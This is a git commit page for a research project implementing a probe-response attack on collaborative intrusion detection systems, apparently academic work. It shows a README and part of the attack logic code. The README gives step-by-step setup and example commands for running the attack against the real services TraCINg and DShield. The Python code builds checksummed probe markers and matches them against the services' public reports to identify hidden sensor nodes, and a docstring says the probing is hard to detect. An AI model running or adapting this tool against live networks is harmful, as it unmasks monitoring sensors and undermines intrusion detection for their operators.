Browse Source

initial commit

Michael Stahn 8 years ago
commit
db166545f5
100 changed files with 5171 additions and 0 deletions
  1. 110 0
      README.md
  2. 0 0
      attack_framework/__init__.py
  3. 727 0
      attack_framework/attack_logic.py
  4. 143 0
      attack_framework/bugfix_socketio/parsers.py
  5. 32 0
      attack_framework/bugfix_socketio/symmetries.py
  6. 252 0
      attack_framework/group.py
  7. 373 0
      attack_framework/group_handler.py
  8. 112 0
      attack_framework/ipv4.py
  9. 206 0
      attack_framework/main_attack.py
  10. 570 0
      attack_framework/main_monitor_simulator.py
  11. 0 0
      attack_framework/pypacker/__init__.py
  12. BIN
      attack_framework/pypacker/__pycache__/__init__.cpython-33.pyc
  13. BIN
      attack_framework/pypacker/__pycache__/__init__.cpython-34.pyc
  14. BIN
      attack_framework/pypacker/__pycache__/checksum.cpython-33.pyc
  15. BIN
      attack_framework/pypacker/__pycache__/checksum.cpython-34.pyc
  16. BIN
      attack_framework/pypacker/__pycache__/pcapng.cpython-33.pyc
  17. BIN
      attack_framework/pypacker/__pycache__/ppcap.cpython-33.pyc
  18. BIN
      attack_framework/pypacker/__pycache__/ppcap.cpython-34.pyc
  19. BIN
      attack_framework/pypacker/__pycache__/psocket.cpython-33.pyc
  20. BIN
      attack_framework/pypacker/__pycache__/psocket.cpython-34.pyc
  21. BIN
      attack_framework/pypacker/__pycache__/pypacker.cpython-33.pyc
  22. BIN
      attack_framework/pypacker/__pycache__/pypacker.cpython-34.pyc
  23. BIN
      attack_framework/pypacker/__pycache__/pypacker_meta.cpython-33.pyc
  24. BIN
      attack_framework/pypacker/__pycache__/pypacker_meta.cpython-34.pyc
  25. BIN
      attack_framework/pypacker/__pycache__/triggerlist.cpython-33.pyc
  26. BIN
      attack_framework/pypacker/__pycache__/triggerlist.cpython-34.pyc
  27. 153 0
      attack_framework/pypacker/checksum.py
  28. 0 0
      attack_framework/pypacker/layer12/__init__.py
  29. BIN
      attack_framework/pypacker/layer12/__pycache__/__init__.cpython-33.pyc
  30. BIN
      attack_framework/pypacker/layer12/__pycache__/__init__.cpython-34.pyc
  31. BIN
      attack_framework/pypacker/layer12/__pycache__/arp.cpython-33.pyc
  32. BIN
      attack_framework/pypacker/layer12/__pycache__/arp.cpython-34.pyc
  33. BIN
      attack_framework/pypacker/layer12/__pycache__/dtp.cpython-33.pyc
  34. BIN
      attack_framework/pypacker/layer12/__pycache__/dtp.cpython-34.pyc
  35. BIN
      attack_framework/pypacker/layer12/__pycache__/ethernet.cpython-33.pyc
  36. BIN
      attack_framework/pypacker/layer12/__pycache__/ethernet.cpython-34.pyc
  37. BIN
      attack_framework/pypacker/layer12/__pycache__/ieee80211.cpython-33.pyc
  38. BIN
      attack_framework/pypacker/layer12/__pycache__/linuxcc.cpython-33.pyc
  39. BIN
      attack_framework/pypacker/layer12/__pycache__/llc.cpython-33.pyc
  40. BIN
      attack_framework/pypacker/layer12/__pycache__/llc.cpython-34.pyc
  41. BIN
      attack_framework/pypacker/layer12/__pycache__/ppp.cpython-33.pyc
  42. BIN
      attack_framework/pypacker/layer12/__pycache__/ppp.cpython-34.pyc
  43. BIN
      attack_framework/pypacker/layer12/__pycache__/pppoe.cpython-33.pyc
  44. BIN
      attack_framework/pypacker/layer12/__pycache__/pppoe.cpython-34.pyc
  45. BIN
      attack_framework/pypacker/layer12/__pycache__/prism.cpython-33.pyc
  46. BIN
      attack_framework/pypacker/layer12/__pycache__/radiotap.cpython-33.pyc
  47. BIN
      attack_framework/pypacker/layer12/__pycache__/stp.cpython-33.pyc
  48. BIN
      attack_framework/pypacker/layer12/__pycache__/vrrp.cpython-33.pyc
  49. 36 0
      attack_framework/pypacker/layer12/arp.py
  50. 37 0
      attack_framework/pypacker/layer12/dtp.py
  51. 189 0
      attack_framework/pypacker/layer12/ethernet.py
  52. 770 0
      attack_framework/pypacker/layer12/ieee80211.py
  53. 78 0
      attack_framework/pypacker/layer12/linuxcc.py
  54. 39 0
      attack_framework/pypacker/layer12/llc.py
  55. 44 0
      attack_framework/pypacker/layer12/ppp.py
  56. 49 0
      attack_framework/pypacker/layer12/pppoe.py
  57. 62 0
      attack_framework/pypacker/layer12/prism.py
  58. 191 0
      attack_framework/pypacker/layer12/radiotap.py
  59. 20 0
      attack_framework/pypacker/layer12/stp.py
  60. 40 0
      attack_framework/pypacker/layer12/vrrp.py
  61. 0 0
      attack_framework/pypacker/layer3/__init__.py
  62. BIN
      attack_framework/pypacker/layer3/__pycache__/__init__.cpython-33.pyc
  63. BIN
      attack_framework/pypacker/layer3/__pycache__/__init__.cpython-34.pyc
  64. BIN
      attack_framework/pypacker/layer3/__pycache__/esp.cpython-33.pyc
  65. BIN
      attack_framework/pypacker/layer3/__pycache__/esp.cpython-34.pyc
  66. BIN
      attack_framework/pypacker/layer3/__pycache__/icmp.cpython-33.pyc
  67. BIN
      attack_framework/pypacker/layer3/__pycache__/icmp.cpython-34.pyc
  68. BIN
      attack_framework/pypacker/layer3/__pycache__/icmp6.cpython-33.pyc
  69. BIN
      attack_framework/pypacker/layer3/__pycache__/icmp6.cpython-34.pyc
  70. BIN
      attack_framework/pypacker/layer3/__pycache__/igmp.cpython-33.pyc
  71. BIN
      attack_framework/pypacker/layer3/__pycache__/igmp.cpython-34.pyc
  72. BIN
      attack_framework/pypacker/layer3/__pycache__/ip.cpython-33.pyc
  73. BIN
      attack_framework/pypacker/layer3/__pycache__/ip.cpython-34.pyc
  74. BIN
      attack_framework/pypacker/layer3/__pycache__/ip6.cpython-33.pyc
  75. BIN
      attack_framework/pypacker/layer3/__pycache__/ip6.cpython-34.pyc
  76. BIN
      attack_framework/pypacker/layer3/__pycache__/ip_shared.cpython-33.pyc
  77. BIN
      attack_framework/pypacker/layer3/__pycache__/ip_shared.cpython-34.pyc
  78. BIN
      attack_framework/pypacker/layer3/__pycache__/ipx.cpython-33.pyc
  79. BIN
      attack_framework/pypacker/layer3/__pycache__/ipx.cpython-34.pyc
  80. BIN
      attack_framework/pypacker/layer3/__pycache__/ospf.cpython-33.pyc
  81. BIN
      attack_framework/pypacker/layer3/__pycache__/ospf.cpython-34.pyc
  82. BIN
      attack_framework/pypacker/layer3/__pycache__/pim.cpython-33.pyc
  83. BIN
      attack_framework/pypacker/layer3/__pycache__/pim.cpython-34.pyc
  84. 10 0
      attack_framework/pypacker/layer3/esp.py
  85. 127 0
      attack_framework/pypacker/layer3/icmp.py
  86. 84 0
      attack_framework/pypacker/layer3/icmp6.py
  87. 18 0
      attack_framework/pypacker/layer3/igmp.py
  88. 223 0
      attack_framework/pypacker/layer3/ip.py
  89. 262 0
      attack_framework/pypacker/layer3/ip6.py
  90. 141 0
      attack_framework/pypacker/layer3/ip_shared.py
  91. 16 0
      attack_framework/pypacker/layer3/ipx.py
  92. 26 0
      attack_framework/pypacker/layer3/ospf.py
  93. 31 0
      attack_framework/pypacker/layer3/pim.py
  94. 0 0
      attack_framework/pypacker/layer4/__init__.py
  95. BIN
      attack_framework/pypacker/layer4/__pycache__/__init__.cpython-33.pyc
  96. BIN
      attack_framework/pypacker/layer4/__pycache__/__init__.cpython-34.pyc
  97. BIN
      attack_framework/pypacker/layer4/__pycache__/sctp.cpython-33.pyc
  98. BIN
      attack_framework/pypacker/layer4/__pycache__/sctp.cpython-34.pyc
  99. BIN
      attack_framework/pypacker/layer4/__pycache__/ssl.cpython-33.pyc
  100. BIN
      attack_framework/pypacker/layer4/__pycache__/ssl.cpython-34.pyc

+ 110 - 0
README.md

@@ -0,0 +1,110 @@
+Probe-response attack
+=====================
+
+This project implements the probe-response attack (PRA) using the effective attack logic
+probosed by Bethencourt et al (see Mapping Internet Sensors With Probe Response Attacks, 2005)
+improved by further methodologies. The first one is made of a generic encoding scheme using checksums
+to filter out non-probe events from attack reports. The second is a fingerprinting approach using feedback
+on network level to cluster monitor nodes in the following attack iteration.
+The attack framework is targeted against TraCINg and DShield and is extensible towards new CIDS (see Extension).
+Furthermore this projects contains a TraCINg installation extended to mitigate the threat
+originated from PRAs and a simulation environment allowing to simulate attacks on TraCINg.
+
+This project is made of the following parts:
+
+* Probe-response attack framework (see ./attack_framework)
+* TraCINg, extended with Probe-Response attack mitigations (see ./tracing)
+* Probe-Response attack simulation environment (see ./attack_framework)
+
+## Requirements and installation ##
+* The attack framework and simulation environment use raw sockets which implies root priviliges.
+* Commands are assumed to be called from the base directory of the project.
+* Do NOT use virtual interfaces not providing data link layer -> ZMap (pcap in particular) needs interfaces with data link access
+
+### Linux based OS ###
+* For Ubuntu the following command installs all needed packages. Depended on the OS version some version can deviate.
+    : apt-get install libgmp3-dev libjson-c-dev libffi-dev npm nodejs-legacy gcc gengetopt byacc libpcap-dev libgmp3-dev mongodb flex cmake build-essential python-dev python3-dev python3-pip python-virtualenv arping
+
+* The following should be installed for 32Bit-compatibility.
+    : apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 libpcap0.8:i386 libcap-1*
+* In the case of simulations the linux kernel module dummy has to be present (default on on Ubuntu)
+* Configure linux to allow more memory usage for network purposes. Add the following to /etc/sysctl.conf:
+
+    : net.core.rmem_default   = 268435456
+    : net.core.wmem_max       = 2147483647
+    : net.core.wmem_default   = 268435456
+    : net.core.netdev_max_backlog = 10000000
+    : Call: sysctl -p
+
+* Disable sending RST to minimize traffic
+    : iptables -A OUTPUT -p tcp -m tcp --tcp-flgas RST,RST RST,RST -j DROP
+    : **Undo of the previous command:**
+    : iptables -D OUTPUT -p tcp -m tcp --tcp-flags RST,RST RST,RST -j DROP
+### Python 3.x ###
+* Install and start virtualenv
+    : virtualenv -p /usr/bin/python3.4 /root/.virtualenv
+    : source /root/.virtualenv/bin/activate
+* Install Python modules
+    : pip install -r attack_framework/requirements.txt
+* Warning: socketio_client needs a bug fix because of wrongly handled encodings (TraCINg sometimes uses non-UTF8 encodings which lets the lib crash)
+    : cp attack_framework/bugfix_socketio/* /root/.virtualenv/lib/python3.4/site-packages/socketIO_client/
+
+
+### ZMap ###
+* The ZMap extension is based on Version v2.1.0-RC1
+    : cd zmap
+    : rm CMakeCache.txt
+    : ./build_zmap.sh
+    : ./update_ip_blacklist.sh
+    : cd .\.
+
+### Node.js ###
+* This is a bugfixed version of TraCINg (allowing ports 0 and 65535 in modules/postHandler.js
+    : cd tracing
+    : rm -rf node_modules
+    : npm install
+    : npm install chance collections event-stream fs
+    : cd .\.
+
+* Problems with MongoDB:
+    : The Latency of Mongo-DB is too large on high traffic which is why
+data insertion is commented out in postHandler.js (not needed)
+
+## Usage ##
+### General initiation ###
+* Create virtual interface and initiate virtual environment (again: use root beacause of raw sockets) This implies virtualenv is placed ad /root/.virtualenv
+    : . ./setup_evironment.sh startinterface
+
+### Starting TraCINg ###
+* cd tracing
+* node --max-new-space-size=4096 --max-old-space-size=2048 index.js
+
+### Starting attack ###
+* The attack framework has to be configured for the target system
+* TraCINg
+    : Set correkt tracing_domain in TracingReportFetcher (or create dedicated report fetcher)
+* DShield
+    : marker value bits=32, marker checksum bits=0 (when doing IP filtering)
+    : use_source_ip_filter in report_fetcher.py
+    : sleeptime in DShieldReportFetcher constructor
+    : **optional: adjust parameters in main_attack.py:**
+	    : ip_stage1 (main_attack.py)
+	    : cidr_bits_stage1 (main_attack.py)
+	    : cores (scanner_wrapper.py)
+* Get gateway MAC via: arping [ip_gateway]
+* Some example calls:
+    : python main_attack.py --help
+    : python main_attack.py -i eth10 -m [mac_gateway] -r 10000 -b 32 -c 0
+
+### Starting Simulation ###
+* General initiation
+* Adjust TraCINg domain in TracingReportFetcher to localhost
+* Starting TraCINg
+* cd attack_framework && python main_monitor_simulator.py -m 1000 [further arguments]
+* Starting attack
+
+## Extension ##
+The attack framework can be extended for new CIDS by subclasing ReportFetcher in report_fetcher.py
+and implementing before_scanning() and after_scanning(). The new class has to be placed
+in the same module. The new report fetcher can be chosen by its class name when starting
+the attack framework using the parameter report_fetcher_classname.

+ 0 - 0
attack_framework/__init__.py


+ 727 - 0
attack_framework/attack_logic.py

@@ -0,0 +1,727 @@
+import os
+import logging
+import threading
+import re
+import pickle
+import os.path
+import time
+import math
+import struct
+import queue
+from multiprocessing import Process, SimpleQueue
+
+from group import Group
+import scanner_wrapper
+import group_handler
+
+import ipv4
+from utility import ip_str_to_bytes
+from pypacker.checksum import fletcher32
+from pypacker.psocket import SocketHndl
+from pypacker.layer12 import ethernet
+from pypacker.layer3 import ip
+from pypacker.layer4 import tcp
+
+split_equal = re.compile("=+").split
+split_space = re.compile(" +").split
+split_tab = re.compile("\t").split
+split_comma = re.compile(",").split
+split_slash = re.compile("/").split
+
+unpack_port = struct.Struct(">H").unpack
+pack_checksum = struct.Struct(">I").pack
+pack_port = struct.Struct(">H").pack
+pack_marker = struct.Struct(">Q").pack
+pack_byte = struct.Struct(">B").pack
+pack_markervalue = struct.Struct(">I").pack
+unpack_marker = struct.Struct(">Q").unpack
+unpack_markervalue = struct.Struct(">Q").unpack
+
+IPv4Address = ipv4.IPv4Address
+IPv4Network = ipv4.IPv4Network
+
+ENCODE_PORT_DST = 1
+ENCODE_IP_SRC = 2
+ENCODE_PORT_SRC = 4
+
+logger = logging.getLogger("pra_framework")
+
+
+class ProbeResponseAttackLogic(object):
+	"""
+	Implemenration of the probe response attack using dedicated scanner for probing.
+	Workflow:
+	>> Stage 1:
+	- Send probes without creating initial groups (saves state information) -> create Groups WHILE scanning
+	- Get result and add Groups to _iterations[index_iteration]
+	- Create groups: Check scanner feedback and re-group per sub-group based on it
+
+	>> Stage 2:
+	- Create Ggroups before scanning (first time: after stage 1/iteration 1)
+	- Set amount of subgroups based on amount of responses
+	- Continue scanning until no groups are left
+	The destination address can be encoded into different parts of markers like
+	source IP address, source port, destination port etc.
+
+	Pre-filtering of noisy values:
+	- Noisy marker values do not get pre-filtered as this problem can be effectively
+	mitigated using a trade off between marker/checksum-bits.
+
+	Detection mitigation:
+	- Avoiding low-noise markers to avoid detection does not seem to be necessary
+	as low noise markers like destination ports would appear with a low frequency
+	-> sending 65535 (dst port) * (other marker) values will appear approximately
+	"amount of sensors" * y times for every attack iterations, which is likely to be a
+	low number for a specific port "p", which is hard to detect as statistic anomaly.
+	"""
+
+	PROP_DEFAULTS = {
+		# network options
+		"interface_name": "eth0",
+		"mac_source": None,
+		"mac_gw": None,
+		# source IP, mainly intended for native probes
+		"ip_src": "1.1.1.1",
+		"rate_kbit_per_s": 1000,
+		# marker options
+		"marker_encoding": 0,
+		"markerbits_value": 24,
+		"markerbits_checksum": 8,
+		# directory to save all data related to a attack cycle (trailing slash)
+		"base_dir_save": "./",
+		# directory which contains "src/zmap"
+		"base_dir_zmap": "../zmap",
+		"disable_monitor": 1,
+		"verbosity": 3,
+		"report_fetcher_classname": "TracingReportFetcher",
+		# state info. Should only be changed by internal logic.
+		# stage 1 or 2 (initial 0)
+		#"_stage": 0,
+		# index to _iterations where most rectent groups get stored
+		"_group_storeindex": 0,
+		"use_feedback_ips": False,
+		"use_plus1": False,
+		# TODO: change for testing
+		"is_simulation": False,
+		# debugging options
+		# avoid scanning the whole network -> limit to a subnet (default is: scan whole IPv4 - blacklist)
+		"_ip_stage1": "0.0.0.0",
+		"_cidr_bits_stage1": 0
+	}
+
+
+	def __init__(self, **kwargs):
+		# set default values, will be overwritten by config variables
+		# parameter hierarchy: default -> constructor
+		for prop, default in ProbeResponseAttackLogic.PROP_DEFAULTS.items():
+			setattr(self, prop, kwargs.get(prop, default))
+			logger.debug("config: %s = %s" % (prop, kwargs.get(prop, default)))
+
+		self._running = False
+		# current scan processes
+		self._current_scans = []
+
+		# Files
+		self._filename_state_groups = os.path.join(self.base_dir_save, "state_groups.bin")
+		# contains information like: ip -> response type
+		self._filename_scannerresponse_stage1 = os.path.join(self.base_dir_save, "scanner_response.csv")
+		if self.is_simulation:
+			self._filename_ip_blacklist = os.path.join(self.base_dir_zmap, "blacklist.conf_simulation")
+			self._filename_ip_whitelist = None
+		else:
+			self._filename_ip_blacklist = os.path.join(self.base_dir_zmap, "blacklist.conf")
+			#self._filename_ip_whitelist = os.path.join(self.base_dir_zmap, "whitelist.conf")
+			self._filename_ip_whitelist = None
+
+		self._filename_ip_blacklist_plus_feedback_ips = os.path.join(self.base_dir_save, "blacklist_plus_feedback_addr.conf")
+		self._filename_full_report = os.path.join(self.base_dir_save, "report_fetcher_responses.csv")
+		self._filename_identified_monitors = os.path.join(self.base_dir_save, "identified_monitors.csv")
+		self._dirname_scanner_logs = self.base_dir_save
+
+		self.set_report_fetcher_class(self.report_fetcher_classname)
+		self._report_fetcher = None
+
+		self.attack_thread = None
+		self.marker_bits_total = self.markerbits_value + self.markerbits_checksum
+		self.marker_bytes_total = math.ceil((self.markerbits_value + self.markerbits_checksum)/8)
+		# amount of bits to shift marker value to make it 4 bytes from the left
+		# bits=9: 0000 0000 0000 0000 0000 0001 1111 1111 -> left shift=23 -> 1111 1111 1000 0000....
+		self.marker_value_leftshit = 32 - self.markerbits_value
+		self.marker_value_bytes_amount = math.ceil(self.markerbits_value/8)
+		self.marker_value_amount = 2 ** self.markerbits_value
+		# By using pl1 groups we are saving/getting additional "amount of new subgroups" marker values
+		logger.debug("total amount of marker VALUES: %d (plus1: %r)" % (self.marker_value_amount, self.use_plus1))
+		logger.debug("initial scan: %r/%r" % (self._ip_stage1, self._cidr_bits_stage1))
+		# Example: 5 marker values:, _log_2(5)_ = 2 -> 2 Bits = 4 Subgroups
+		self.cidr_bits_stage1 = math.floor(math.log(self.marker_value_amount, 2))
+		self.marker_checksum_bytes_amount = math.ceil(self.markerbits_checksum / 8)
+
+		# Groups which got/get scanned.
+		# [[start, stop], {marke: Group}, total groups, total addresses]
+		self._iterations = []
+		self._iterations.append([[0, 0], {}, 0, 0])
+		initial_group = Group(ip_network_object=IPv4Network(nw_ip_str=self._ip_stage1,
+															prefixlen=self._cidr_bits_stage1),
+							response_count=0)
+		self._root_group_name = b"ROOT_GROUP_PRA"
+		self._iterations[0][1][self._root_group_name] = initial_group
+		addresses_root = 2 ** (32 - self._cidr_bits_stage1)
+		self._iterations[0][2] = min(self.marker_value_amount, addresses_root)
+		self._iterations[0][3] = addresses_root
+		self._group_storeindex = 0
+
+		"""
+		if self.markerbits_value % 8 != 0 or self.markerbits_checksum % 8 !=0:
+			logger.warning("markerbits not multiple of 8, value/checksum = %r/%r" %
+							(self.markerbits_value, self.markerbits_checksum))
+		"""
+		# native prober
+		# TODO: adjust this on other platforms
+		self._native_prober_amount = 5
+		self._native_prober_sockets = []
+		self._native_prober_conn_send = []
+		self._native_prober_processes = []
+		self._native_prober_conn_send_index = 0
+		self._groupqueue = SimpleQueue()
+		self._blacklist = set()
+		# { top group marker value -> set(feedback_address1, feedback_address2, ...)}
+		self._blacklist_toptoipv4obj = {}
+		self._grouphandler = group_handler.GroupHandler(self.marker_value_amount,
+														self.use_plus1,
+														self._create_marker_bitlevel)
+		self._initial_count = 0
+
+	def set_report_fetcher_class(self, classname):
+		if self._running:
+			return
+		# get report fetcher by classname
+		fetcher_module = __import__("report_fetcher")
+
+		try:
+			logger.debug("setting report fetcher class: %s" % classname)
+			self._reportfetcher_class = getattr(fetcher_module, classname)
+		except:
+			raise Exception("could not load Report Fetcher class! Is it implemented in report_fetcher.py?")
+
+	def _report_values_to_marker(self, ip_source, port_src, port_dst):
+		"""
+		Combines all markers given by a report in the correct order. Unused parts are left out.
+		return -- markervalue (int), markerchecksum (int), marker (bytes)
+		"""
+		bts = []
+		if self.marker_encoding & ENCODE_PORT_DST == ENCODE_PORT_DST:
+			bts.append(pack_port(port_dst))
+		if self.marker_encoding & ENCODE_IP_SRC == ENCODE_IP_SRC:
+			bts.append(ip_str_to_bytes(ip_source))
+		if self.marker_encoding & ENCODE_PORT_SRC == ENCODE_PORT_SRC:
+			bts.append(pack_port(port_src))
+		bts = b"".join(bts)
+		#logger.debug("decoding: %s" % bts)
+		markervalue_and_checksum = int.from_bytes(bts, "big")
+		#logger.debug("report full marker: %s=%d" % (bts, markervalue_and_checksum))
+		# marker value: b"AAAA AAAA AAAA AABB" -> b"00AA AAAA AAAA AAAA"
+		# marker checksum: b"AAAA AAAA AAAA AABB" -> b"0000 0000 0000 00BB"
+		marker_length = self.marker_bits_total
+		return (markervalue_and_checksum >> (marker_length - self.markerbits_value)),\
+				markervalue_and_checksum & (0xFFFFFFFFFFFFFFFF >> (64 - self.markerbits_checksum)),\
+				bts
+
+	def _create_checksum_bitlevel(self, markervalue):
+		"""
+		Create a checksum using value markervalue
+		markervalue -- integer to create checksum from (non padded)
+		return -- checksum as integer
+		"""
+		marker_value_leftshifted = markervalue << self.marker_value_leftshit
+		marker_value_bytes_forchecksum = pack_markervalue(marker_value_leftshifted)
+		#logger.debug("padded marker value before checksum: %s" % marker_padded)
+		#return pack_checksum(fletcher32(marker_padded, len(marker_padded)/2)), marker_padded
+		#checksum_int = fletcher32(marker_value_bytes_forchecksum, len(marker_value_bytes_forchecksum)/2) & 0xFFFFFFFF
+		return fletcher32(marker_value_bytes_forchecksum, 2) >> (32 - self.markerbits_checksum)
+
+	def _create_marker_bitlevel(self, marker_value_int_to_encode):
+		"""
+		Create a new marker like [marker][checksum] from the given value_int.
+		marker value:
+		291 -> b"00000123" (hex) -> b"000123" (marker value: eg 3 bytes)
+		-> chk = checksum(b"000123"	-> b"00012300") = b"abcdefgh"
+		-> b"000123" (marker value) + b"abcdefgh"[:checksum_len] (marker checksum)
+		Resulting marker (3 value bytes, 2 checksum bytes): b"000123abcdefgh" -> b"000123abcd"
+
+		WARNING: this assumes self.marker_bits_total % 8 == 0 is True (otherwise shift resulting marker to the left)
+		"""
+		checksum_int = self._create_checksum_bitlevel(marker_value_int_to_encode)
+		# take marker value from left, cut off marker bits from right
+		marker_int = (marker_value_int_to_encode << self.markerbits_checksum) | checksum_int
+		#logger.debug("new marker value orig/marker value for checksum/checksum is = %s/%s/%s" %
+		#			 (marker_value, marker_value_padded, marker_checksum))
+		# INFO: if self.marker_bits_total is not divisible by 8 without rest: shift self.marker_bits_total % 8 to right
+		return pack_marker(marker_int)[-self.marker_bytes_total:]
+
+	def _read_scanner_feedback_addresses(self):
+		"""
+		Read scanner feedback addresses gathered from stage 1. Additionally this updates
+		_filename_ip_blacklist_plus_feedback_ips to contain all blacklisted IPs (including feedback ones).
+		"""
+		if not os.path.exists(self._filename_scannerresponse_stage1):
+			logger.warn("could not find response file at: %s" % self._filename_scannerresponse_stage1)
+			return []
+		logger.debug("reading feedback file")
+		fd = open(self._filename_scannerresponse_stage1, "r")
+		# skip header
+		fd.readline()
+		# File format of feedback file:
+		# classification,saddr,daddr,daddr_inner_icmp,sport,dport,success
+		# rst,1.0.0.0,1.1.1.1,(None),256,2,0
+		# synack,1.0.0.1,1.1.1.1,(None),256,2,1
+		self._blacklist.clear()
+		self._blacklist_toptoipv4obj.clear()
+		groups_stage1 = self._iterations[1][1]
+		# found IP -> remove trailing/unused bits: (found IP) >> (IPv4 length - (marker value bits))
+		bits_shift_ip = 32 - self.markerbits_value
+
+		for line in fd:
+			columns = split_comma(line)
+			if len(columns) < 4:
+				logger.warning("not enough columns in CSV file: %r" % columns)
+				continue
+			# CSV format: type,ip src (attack target), ip dst,ip extern (our extern ip),...
+			responsetype = columns[0]
+
+			# assume everything other than ICMP are potential monitor nodes
+			if not responsetype.startswith("icmp"):
+				address = columns[1]
+			else:
+				continue
+				# assume ICMP unreachable indicates no monitor node
+			try:
+				# convert ip to marker value and check if its belongs to a found group
+				# this is MUCH faster than checking every single group
+				address_obj = IPv4Address(ip_str=address)
+				# 1.2.3.4 -> 1.2 = marker value
+				top_group_markervalue = address_obj.ip_int >> bits_shift_ip
+
+				if not top_group_markervalue in groups_stage1:
+					#logger.derbug("skipping IP not belonging in initial groups: %r" % address_obj)
+					continue
+			except Exception as ex:
+				logger.warning("invalid IPv4 address in feedback file: %r" % address)
+				print(ex)
+				continue
+
+			# this is a bit redundant but doesn't hurt
+			if address_obj.packed not in self._blacklist:
+				self._blacklist.add(address_obj.packed)
+			else:
+				# already saved
+				# skip adding the address to the _blacklist_toptoipv4obj list
+				continue
+
+			try:
+				self._blacklist_toptoipv4obj[top_group_markervalue].append(address_obj)
+			except KeyError:
+				self._blacklist_toptoipv4obj[top_group_markervalue] = [address_obj]
+
+		fd.close()
+		logger.debug("amount feedback addresses: %d" % len(self._blacklist))
+
+		# update extended blacklist file
+		logger.debug("updating extended blacklist file")
+		fd_read = open(self._filename_ip_blacklist, "r")
+		blacklist_standard = fd_read.read()
+		fd_read.close()
+		fd_write = open(self._filename_ip_blacklist_plus_feedback_ips, "w")
+		fd_write.write(blacklist_standard)
+
+		for top_group_markervalue, addresses in self._blacklist_toptoipv4obj.items():
+			for addr in addresses:
+				fd_write.write("%s/32\n" % addr.compressed)
+		fd_write.close()
+
+	def _addentry_callback(self, ip_source, port_src, port_dst):
+		"""
+		Callback called by reportfetcher if a new reponse was found.
+		ip_source -- IPv4 address as string
+		port_src -- source port as int
+		port_dst -- destination port as int
+		"""
+		marker_value_report_int, marker_checksum_report_int, marker_report = self._report_values_to_marker(ip_source,
+																											port_src,
+																											port_dst)
+		#logger.debug("from report: marker value=%d, checksum=%d, full marker=%s" %
+		#  (marker_value_report_int, marker_checksum_report_int, marker_report))
+		marker_checksum_gen = self._create_checksum_bitlevel(marker_value_report_int)
+		#logger.debug("comparing checksum: new/report = %s/%s" % (checksum_gen, marker_checksum_report))
+
+		# compare via startswith: checksum could only be partially encoded
+		# skip values having invalid checksums, ignore if no checksum is used
+		if marker_checksum_report_int != marker_checksum_gen and self.markerbits_checksum != 0:
+			#logger.debug("checksum didn't match (YOLO): %r!=%r" % (
+			#			  marker_checksum_report_int, marker_checksum_gen))
+			return
+		# logger.debug("checksum matched!!!")
+
+		if self._group_storeindex == 1:
+			group_dict_current = self._iterations[1][1]
+
+			if marker_value_report_int in group_dict_current:
+				group_dict_current[marker_value_report_int].response_count += 1
+				"""
+				logger.debug("incremented response count: group=%r, count=%d" %
+						(group_dict_current[marker_report], group_dict_current[marker_report].response_count))
+				"""
+			else:
+				# create initial entries
+				# marker value is actually (part of) our IP address in the first stage
+				ip_int = marker_value_report_int << (32 - self.markerbits_value)
+
+				try:
+					ip_network = IPv4Network(nw_ip_int=ip_int, prefixlen=self.cidr_bits_stage1)
+					newgroup = Group(ip_network_object=ip_network, response_count=1)
+
+					"""
+					self._initial_count += 1
+					if self._initial_count % 100 == 0:
+						logger.debug("%d: creating initial group based on report response: marker=%s, group=%r" %
+								(self._initial_count, marker_report, newgroup))
+					"""
+					self._iterations[0][1][self._root_group_name].add_subgroup(newgroup)
+					group_dict_current[marker_value_report_int] = newgroup
+				except Exception as ex:
+					logger.warning("could not create initial group (first stage), correct checksum but wrong network? ip=%r" % ip_int)
+					print(ex)
+		else:
+			group_dict_current = self._iterations[self._group_storeindex][1]
+			# add entries for iteration >= 2
+			try:
+				# group should be created until now
+				# this can additionally filter out noise as groups are created incrementally
+				subgroup = group_dict_current[marker_value_report_int]
+				#if random.random() > 0.5:
+				#	logger.debug("marker value=%d" % marker_value_report_int)
+				subgroup.response_count += 1
+
+				# connect to top group to subgroup if not yet known
+				# sub groups not connected get deleted at the end of each iteration
+				# subgroup was not yet added, do it now
+				if subgroup.response_count == 1:
+					subgroup.top_group.add_subgroup(subgroup)
+			except KeyError:
+				"""
+				logger.warning("checksum correct but marker value %r not found for response (total: %d), "
+								"marker=%r -> not counting" % (
+								marker_value_report_int, len(group_dict_current), marker_report))
+				"""
+				#logger.warning("ip=%r, port src=%r, port dst=%r" % (ip_source, port_src, port_dst))
+				pass
+
+	def _save_state(self):
+		"""
+		Save the current group state using python pickle format.
+		"""
+		logger.debug("saving state to: %s" % self._filename_state_groups)
+		fd_state = open(self._filename_state_groups, "wb")
+		pickle.dump(self._iterations, fd_state)
+		fd_state.close()
+		logger.debug("finished saving state")
+
+	def start(self):
+		"""
+		Starts the PRA attack.
+		"""
+		if self._running:
+			logger.debug("can not start: attack is already running")
+			return
+		# init report fetcher
+		self._report_fetcher = self._reportfetcher_class(self._addentry_callback,
+														self._filename_full_report)
+		self._running = True
+		self.attack_thread = threading.Thread(target=self._do_attack)
+		self.attack_thread.start()
+
+	def stop(self):
+		"""
+		Stops the PRA attack.
+		"""
+		if not self._running:
+			logger.warning("Scanner is not running -> nothing to stop")
+			return
+		self._running = False
+		logger.debug("stopping any scan processes")
+
+		for scanner in self._current_scans:
+			scanner.stop()
+		for sock in self._native_prober_sockets:
+			sock.close()
+		for proc in self._native_prober_processes:
+			proc.terminate()
+
+		addresses_found_amount = sum([gti[0].amount_addresses for gti in self._grouphandler.identified_groups])
+		logger.info("found %d addresses, saving to: %s" % (addresses_found_amount, self._filename_identified_monitors))
+		fd_write = open(self._filename_identified_monitors, "w")
+		fd_write.write("address\ttimestamp\titeration\n")
+
+		for group_timestamp_iteration in self._grouphandler.identified_groups:
+			ts = group_timestamp_iteration[1]
+			iteration = group_timestamp_iteration[2]
+
+			for address in group_timestamp_iteration[0].addresses:
+				line = "%s\t%d\t%d\n" % (address, ts, iteration)
+				fd_write.write(line)
+				#logger.debug(line.strip())
+		fd_write.close()
+		self._save_state()
+
+	def _start_native_prober(self):
+		"""
+		Initiate processes to probe using a native python implementation.
+		"""
+		self._native_prober_conn_send.clear()
+
+		for cnt in range(self._native_prober_amount):
+			socket_hndl = SocketHndl(iface_name=self.interface_name, buffersize_send=2 ** 28)
+			self._native_prober_sockets.append(socket_hndl)
+
+			proc = Process(target=self._probe_native_cycler, args=(cnt,
+																socket_hndl,
+																self._groupqueue,
+																self._blacklist,
+																self.mac_source,
+																self.mac_gw,
+																self.ip_src,
+																self.marker_encoding))
+			self._native_prober_processes.append(proc)
+			proc.start()
